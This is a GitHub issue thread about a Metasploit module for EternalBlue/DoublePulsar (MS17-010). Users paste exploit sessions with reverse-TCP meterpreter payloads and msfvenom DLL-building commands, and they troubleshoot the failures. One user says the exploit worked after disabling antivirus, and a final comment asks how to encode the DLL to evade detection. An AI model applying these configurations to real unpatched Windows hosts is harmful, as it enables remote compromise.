Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1

HELP-ME #9

Closed UrielRicardo closed 7 years ago

UrielRicardo commented 7 years ago

msf exploit(eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on xxxxxxxxxxxxxxxx:4444
[*] xxxxxxxxxxxxxxxx:445 - Generating Eternalblue XML data
[*] xxxxxxxxxxxxxxxx:445 - Generating Doublepulsar XML data
[*] xxxxxxxxxxxxxxxx:445 - Generating payload DLL for Doublepulsar
[*] xxxxxxxxxxxxxxxx:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] xxxxxxxxxxxxxxxx:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] xxxxxxxxxxxxxxxx:445 - Are you sure it's vulnerable?
[*] xxxxxxxxxxxxxxxx:445 - Launching Doublepulsar...
[-] xxxxxxxxxxxxxxxx:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

I've run the scanner and it returned that it is vulnerable. What would this error be?

NickGoodLuck commented 7 years ago

Hi, I think you need to provide more details, such as target information, your Metasploit settings, and the parameters you set for the DLL.

UrielRicardo commented 7 years ago

rhost = Windows server 2008 r2, rport = 445 lsass.dll lhost = my ip payload = reverse tcp

NickGoodLuck commented 7 years ago

Hi, I am not sure what your target architecture is (x86 or x64). The exploit's default payload is windows/meterpreter/reverse_tcp, which is for x86, and the DLL for Doublepulsar should be built by the command "./msfvenom -p windows/meterpreter/reverse_tcp ......". For x64, you should change the default target architecture and default payload, and the command for building the DLL should be "./msfvenom -p windows/x64/meterpreter/reverse_tcp ......". P.S. the exploit is workable. Good luck! A screenshot is useful for solving the issue!

msdnteam commented 7 years ago

Found a solution? I have the same problem. The fact is that when I start Eternalblue directly (IP to IP) it works well. When I start it through the route I get this problem. The computer is the same. IP to IP works well, through the route it does not.

msf > route

IPv4 Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.145.0      255.255.255.0      Session 1

msf auxiliary(smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.145.10   yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > run

[*] 192.168.145.10:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:WIN4) (workgroup:WORKGROUP)

msf exploit(eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.100.105:4444
[*] 192.168.145.10:445 - Generating Eternalblue XML data
[*] 192.168.145.10:445 - Generating Doublepulsar XML data
[*] 192.168.145.10:445 - Generating payload DLL for Doublepulsar
[*] 192.168.145.10:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.145.10:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.145.10:445 - Are you sure it's vulnerable?

mapagm commented 7 years ago

Same issue here.

msf auxiliary(smb_ms17_010) > run
[+] XXX.XXX.X.XX:445      - Host is likely VULNERABLE to MS17-010!  (Windows 8.1 9600)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       lsass.exe                                        yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               XXX.XXX.X.XX                                     yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x64                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     XXX.XXX.X.XX     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)

I get error:

[*] Started reverse TCP handler on XXX.XXX.X.XX:4444 
[*] XXX.XXX.X.XX:445 - Generating Eternalblue XML data
[*] XXX.XXX.X.XX:445 - Generating Doublepulsar XML data
[*] XXX.XXX.X.XX:445 - Generating payload DLL for Doublepulsar
[*] XXX.XXX.X.XX:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] XXX.XXX.X.XX:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] XXX.XXX.X.XX:445 - Are you sure it's vulnerable?
[*] XXX.XXX.X.XX:445 - Launching Doublepulsar...
[-] XXX.XXX.X.XX:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

netzeng commented 7 years ago

I have the same problem as you.

[+] 192.168.144.128:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2003 3790 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                                    Required  Description
   ----                ---------------                                                    --------  -----------
   DOUBLEPULSARPATH    /usr/share/metasploit-framework/modules/exploits/windows/smb/deps  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /usr/share/metasploit-framework/modules/exploits/windows/smb/deps  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                                       yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.144.128                                                    yes       The target address
   RPORT               445                                                                yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                                                yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/                                                             yes       WINE drive_c path

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.144.134  yes       The listen address
   LPORT     4444             yes       The listen port

[*] Started reverse TCP handler on 192.168.144.134:4444
[*] 192.168.144.128:445 - Generating Eternalblue XML data
[*] 192.168.144.128:445 - Generating Doublepulsar XML data
[*] 192.168.144.128:445 - Generating payload DLL for Doublepulsar
[*] 192.168.144.128:445 - Writing DLL in /root/eternal11.dll
[*] 192.168.144.128:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.144.128:445 - Are you sure it's vulnerable?
[*] 192.168.144.128:445 - Launching Doublepulsar...
[-] 192.168.144.128:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.

NickGoodLuck commented 7 years ago

@netzeng your TARGETARCHITECTURE is x86 and your payload is for x64! This may be a problem!

netzeng commented 7 years ago

Thanks very much. Problem has been resolved:

set TARGETARCHITECTURE x86
set Payload windows/x86/meterpreter_reverse_tcp

BratE9000 commented 7 years ago

Compared to netzeng I don't know if Payload locations changed since June 11, but for me, I found them here:

set Payload windows/x64/meterpreter/reverse_tcp
set Payload windows/meterpreter/reverse_tcp

I still never got it working on Windows XP MCE (x86):


use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > run

[+] 192.168.10.155:445 - Host is likely VULNERABLE to MS17-010! (Windows 5.1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.10.155                                   yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.190   yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP (all services pack) (x86) (x64)


msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.10.190:4444
[*] 192.168.10.155:445 - Generating Eternalblue XML data
[*] 192.168.10.155:445 - Generating Doublepulsar XML data
[*] 192.168.10.155:445 - Generating payload DLL for Doublepulsar
[*] 192.168.10.155:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.10.155:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.10.155:445 - Are you sure it's vulnerable?
[*] 192.168.10.155:445 - Launching Doublepulsar...
[-] 192.168.10.155:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.


I did have SP3 installed and a security update, but I backed those out. I am going to try a new load from disk and try the exploit before applying the updates.

Has anyone done this successfully on Windows MCE? See anything wrong in my settings/commands? Thanks!

Update: I tried reloading from an old DVD, tried XP Pro from the XP Mode image, tried a different attack platform. Always the same. Does this thing work on XP? Please help.

Alex-Fillipe commented 6 years ago

Mine gives it too, has someone else got it? Because I already did everything to be commenting here, except for x86, because my Kali Linux does not have this option.

BratE9000 commented 6 years ago

I feel your pain. I tried XP Pro, XP MCE (both x86), Vista Ultimate x64. No luck. Loaded up Server 2008 and got it first try. But this thread is closed. There are a couple of open issues you can post to.

u-s-fire commented 6 years ago

Need help

skype u.s.fire

Bertrand-47 commented 5 years ago

I faced the same problem while trying to test the MS17_010 exploit. I tried everything, and I even reinstalled the system, but nothing changed. I felt like hell. But finally, I figured out the problem.

So here was my scenario: at first, I scanned my target using auxiliary/scanner/smb_ms17_010 and bingo! My target was vulnerable. I went on with exploit/windows/smb/ms17_010 and I filled in all the information, but it got stuck on launching Eternalblue and after a while, a message popped up telling me the target is not vulnerable.

I was convinced that there was something I was not passing well in the exploit, like payload or target architecture. I tried everything but I got the same result.

And finally, I discovered that on my target computer there was a crashed antivirus which was not popping up a message that it caught something (it was AVAST, to be precise), but when my exploit was trying to be launched the AV was intercepting the connection, identifying it as a potential threat, and blocking that connection. So my computer or my exploit was not able to communicate with the back-door because it was never installed on the target computer. So I deactivated it for checking and I retried my exploit and everything worked properly and I was able to get the meterpreter :-)

So my advice is this for those who will face the same issue.

You need to understand that the auxiliary/scanner/smb_ms17_010 is not giving the wrong information about the scanned system. The given information is true. Even though the system is vulnerable, modern AV software is meant to reinforce the system's security, so it may be an obstacle for your exploit. There is nothing wrong with your OS.

Check and see if there is any AV software running on your target computer before going any further.

I hope it helps

Alex-Fillipe commented 5 years ago

Thank you

Sent from my iPhone

On 28 Dec 2018, at 23:22, Bertrand SIBOMANA <notifications@github.com> wrote:


Bertrand-47 commented 5 years ago

You're Welcome!!

rodribruno81 commented 5 years ago

Hi, the antivirus detects the eternal11.dll file. How do you encode it? Thanks!